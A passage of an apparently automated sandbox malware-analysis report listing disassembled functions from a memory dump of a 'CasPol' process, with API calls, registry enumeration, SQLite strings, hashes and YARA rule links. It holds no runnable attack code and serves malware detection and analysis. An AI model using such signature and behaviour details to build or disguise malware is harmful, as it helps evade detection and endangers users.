                                                                                                                                                                                  • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                                                  Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • strlen.MSVCRT ref: 00408DFA
                                                                                                                                                                                    • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                                                                                                  • memset.MSVCRT ref: 00408E46
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memsetstrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2350177629-0
                                                                                                                                                                                  • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                  • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                                                                                                  • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                                                                                                  Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                                                                                  • API String ID: 2221118986-1606337402
                                                                                                                                                                                  • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                  • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                                                                                                  • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                                                                                                  Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00408FB3
                                                                                                                                                                                  • memset.MSVCRT ref: 00408FD4
                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409025
                                                                                                                                                                                  • memset.MSVCRT ref: 00409042
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                                                                                                    • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 265355444-0
                                                                                                                                                                                  • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                  • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                                                                                                  • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                                                                                                                                                                                  • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                                                                                                  Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                    • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                    • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                    • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C439
                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                  • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                    • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                    • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                    • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4131475296-0
                                                                                                                                                                                  • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                  • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                                                                                  • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                                                                                  • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                                                                                  Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004116FF
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                    • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                    • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                    • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                    • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                    • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                    • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                                                    • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                                                    • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                                                    • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                                                    • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                                                  • API String ID: 2618321458-3614832568
                                                                                                                                                                                  • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                  • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                                                  Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AttributesFilefreememset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2507021081-0
                                                                                                                                                                                  • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                  • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                                                  • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                                                  Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                                                  • malloc.MSVCRT ref: 00417524
                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                                                  • free.MSVCRT ref: 00417544
                                                                                                                                                                                  • free.MSVCRT ref: 00417562
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4131324427-0
                                                                                                                                                                                  • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                                                  • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                                                  Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PathTemp$free
                                                                                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                                                                                  • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                  • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                  Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040FDD5
                                                                                                                                                                                    • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 0040FE1F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                                                                                                                  • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                                                  • API String ID: 1775345501-2769808009
                                                                                                                                                                                  • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                  • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                                                                                                                                                  Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                                                  • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                                                  • String ID: General
                                                                                                                                                                                  • API String ID: 999786162-26480598
                                                                                                                                                                                  • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                  • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                                                  • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                                                  • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                                                  Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ErrorLastMessage_snwprintf
                                                                                                                                                                                  • String ID: Error$Error %d: %s
                                                                                                                                                                                  • API String ID: 313946961-1552265934
                                                                                                                                                                                  • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                  • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                                                                                  • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                                                                                  • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                                                                                  Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: foreign key constraint failed$new$oid$old
                                                                                                                                                                                  • API String ID: 0-1953309616
                                                                                                                                                                                  • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                  • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                                                                                  • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                                                                                  Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                                                                                  • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                                                                                  • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                                  • API String ID: 3510742995-272990098
                                                                                                                                                                                  • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                  • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                                                                                  • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                                                                                  • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                                                                                  Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                  • memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpymemset
                                                                                                                                                                                  • String ID: gj
                                                                                                                                                                                  • API String ID: 1297977491-4203073231
                                                                                                                                                                                  • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                  • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                                                                                  • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                                                                                  • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                                                                                  Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                                                                                    • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                                                                                  • free.MSVCRT ref: 0040E9D3
                                                                                                                                                                                    • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??3@$free
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2241099983-0
                                                                                                                                                                                  • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                  • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                                                                                  Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                                                                                  • malloc.MSVCRT ref: 004174BD
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                                                                                  • free.MSVCRT ref: 004174E4
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 4053608372-0
                                                                                                                                                                                  • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                                                  • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                                                                                                                  • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                                                                                  Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • GetParent.USER32(?), ref: 0040D453
                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0040D460
